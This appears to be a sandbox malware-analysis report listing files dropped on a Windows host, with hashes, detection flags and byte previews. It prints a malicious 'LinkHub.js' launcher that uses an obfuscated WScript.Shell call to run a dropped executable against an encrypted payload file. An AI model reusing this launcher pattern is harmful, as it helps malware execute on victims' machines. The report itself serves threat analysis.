                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.262139454704628
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJfshHHrPeUkwRe9:YvXKXmapj2Zc0vYGUUUkee9
                                                                  MD5:4533F5E544C1ABEFE9D9154B813740FD
                                                                  SHA1:D76AA5EAF8272C5E48FD9B84A8AD7010CCEF830A
                                                                  SHA-256:9B769F34109F86EB4BDBA5B9539B9787F45086F84C350382F6998123A4458BC2
                                                                  SHA-512:6B4EC80BF227029E8EA42DC1192EE0C65A42EDE9DD0B5D629BC3F213737A53A9D15C9932876EEAFB2B0CE45BCB9DA06EAFB9B2804EEEB83FB4CA9B8EB8666896
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.269394349154731
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXmXqpyGnHVoZcg1vRcR0YSToAvJTqgFCrPeUkwRe9:YvXKXmapj2Zc0vYGTq16Ukee9
                                                                  MD5:6EBE9A33323E2DC0925B39F10D7A3101
                                                                  SHA1:192E6CE39221BB008E4783963481EE3A34F34765
                                                                  SHA-256:E304AE90DF70342F2EB2D865C6832A6B020A824B1B7419DAA875A82510CECC1D
                                                                  SHA-512:E2C4586A28A37C99E866207227C3287123706F880A977202B46A7BE07F412D31BAFF30E0A83FE8708652CEF6C944A2D0E03FEB8055476B42822875550897310A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"fe26cad9-2300-41af-bb42-0b6437cf88ca","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736445474695,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.135034536060999
                                                                  Encrypted:false
                                                                  SSDEEP:24:YWtpwkGaADIayTayoALSmLJXRe6fha/k7kkKlO3PjW86vj0SRf1UU1CQC2y48BPA:YLgXM6YlqWFj/eT4QPNe+caFSMuQ9JA
                                                                  MD5:80E0F3E44D09197F99CD86B22092CD5C
                                                                  SHA1:77822EF46255E4E3B5C1AEB9A5CB721699B6BEAC
                                                                  SHA-256:0A577FDD0C9B09E1BE46A50F8E95BEC1AAA19B267A0B22FD865F3746041D14B5
                                                                  SHA-512:EAD5CACC6E8FEDC5383487563E0AEB323E6B0FC5ED3AE8EC9CE6EA20FA0C59AFF3B1B930B9CBBBE92F913FB8472CF057E4A6E5288228D3B850CEC7FBF72B96B5
                                                                  Malicious:false
                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"2fa6de4bfe6427aebbf750a700f7cf07","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736269989000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"553e3aca3fc5987d1d1d838914a3db1c","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736269989000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d59e5ea4b34fea3b81980dcc85c699b0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736269989000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"bcc045e0d05398e2eb3645a83197b7f4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736269989000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e94ab630f0998830bc2e9853c6b8f90e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736269989000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"d51e1704a0f05df22c3c3cb07625f3ff","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):1.1896414498617545
                                                                  Encrypted:false
                                                                  SSDEEP:48:TGufl2GL7msEHUUUUUUUU89gdSvR9H9vxFGiDIAEkGVvp49gp:lNVmswUUUUUUUU89gd+FGSIt89gp
                                                                  MD5:F74EB3A9C37D529CC19C500605F94B9C
                                                                  SHA1:26F4DCBC487EBB14550A254665FFEB94A2A3EF2B
                                                                  SHA-256:BDF758C0E88A3F0F85C1083981425506C15C8EEDA2B7083B5AB7BCAB2467D3E9
                                                                  SHA-512:9343E5E9FDA2668BB727E859D7AB1B0DDDCC09BA5C633C2ADA492F60C9ED2DF4D4D0EDF468F0CDDD0EF1748A50C4DB1B7E9D108408BD6E9B8D63335215E5A457
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.6092194949745733
                                                                  Encrypted:false
                                                                  SSDEEP:48:7MDgKUUUUUUUUUU89glvR9H9vxFGiDIAEkGVvTqFl2GL7msi:7UUUUUUUUUUU89gBFGSItJKVmsi
                                                                  MD5:5230AB786BA12325F462B2E5F3B5110E
                                                                  SHA1:D49436D20E367570608269FB461DFDF7BC2D3606
                                                                  SHA-256:39EBA12357CDC89A3470775FE391FCA8895061EE5C7BFBA3DE05CBBCD2B93793
                                                                  SHA-512:075518A060F1155C98E70120863E9F58A07DE933E963340085A069DDDBA1DB5D109468DEC933BB169E094E14823AE236AFF1BDEE127F09792B7E87F65D29EBF7
                                                                  Malicious:false
                                                                  Preview:.... .c.......$P......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgywXm0idnIzlDC8FQvwRqeCEHYyu:6a6TZ44ADEywXRidnIzwdGK
                                                                  MD5:F69DB163835B3657248F134CE8690D78
                                                                  SHA1:48705F214A2FA8B147DDA54E9397B40011F2FB0F
                                                                  SHA-256:933AFAB7EA16FAEA99C10247BC55D5ECDDF6DE3560C9AA904CC51D88916796F6
                                                                  SHA-512:05485061E94339596D2D75F8906DC7A8E2086D8FD6D3742F0AA4DE62018208DDDE19D0CF5F1F450183839978A083C9BC899C66C9CAC3F1E3ECA6BB8E4A4BBE1D
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                  C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: [UPD]Intel_Unit.2.1.exe, Detection: malicious, Browse
                                                                  • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: RailProvides_nopump.exe, Detection: malicious, Browse
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.8.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: DansMinistrie.exe, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                  • Filename: Set-up.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):195
                                                                  Entropy (8bit):4.7615351185197845
                                                                  Encrypted:false
                                                                  SSDEEP:6:RiOnJHonwWDKaJkDHLFkNx5AW9GfwWDKaJkDHLFkNx57:YIQjWaiF+/dG7WaiF+/7
                                                                  MD5:9DD76500C74BBB507074A3DA164E755D
                                                                  SHA1:72EBC79800AD7A96DCC8923A186D7ECA36561F28
                                                                  SHA-256:6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
                                                                  SHA-512:531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
                                                                  Malicious:true
                                                                  Preview:new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")

                                                                  C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\U

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Approaches

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):488285
                                                                  Entropy (8bit):7.998550946105718
                                                                  Encrypted:true
                                                                  SSDEEP:12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
                                                                  MD5:7A07DED0E02828AA5F3CFBAD5642C558
                                                                  SHA1:166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
                                                                  SHA-256:2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
                                                                  SHA-512:9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
                                                                  Malicious:false
                                                                  Preview:MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@*w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...|uL.*....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j.*...Jl..[l..|.~.....f.*.>..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Beam

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):67584
                                                                  Entropy (8bit):7.997420919125293
                                                                  Encrypted:true
                                                                  SSDEEP:1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
                                                                  MD5:18E13DD846278DD017E9BDD8322ACF0E
                                                                  SHA1:431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
                                                                  SHA-256:4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
                                                                  SHA-512:005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
                                                                  Malicious:false
                                                                  Preview:.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...X*C.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p*-qs.G)z.8|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Blocked

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):101376
                                                                  Entropy (8bit):7.9982174281872025
                                                                  Encrypted:true
                                                                  SSDEEP:3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
                                                                  MD5:99A9AA7C4197C9FA2B465011F162397E
                                                                  SHA1:F4501935D473209F9D6312E03E71B65271D709E4
                                                                  SHA-256:6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
                                                                  SHA-512:03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
                                                                  Malicious:false
                                                                  Preview:4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7.*..%...".&].2....@......Q...YZ.d.P...r\.;...*e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d.*.?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....*>...i.y.b.....5.G*[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da*.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Brian

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97280
                                                                  Entropy (8bit):5.234350627932401
                                                                  Encrypted:false
                                                                  SSDEEP:768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
                                                                  MD5:031B6C0EDF7E1DD8ACF9700CC96085D7
                                                                  SHA1:0819EC14EBC323A9507E52A0579F6F9BA1589C3D
                                                                  SHA-256:7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
                                                                  SHA-512:75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
                                                                  Malicious:false
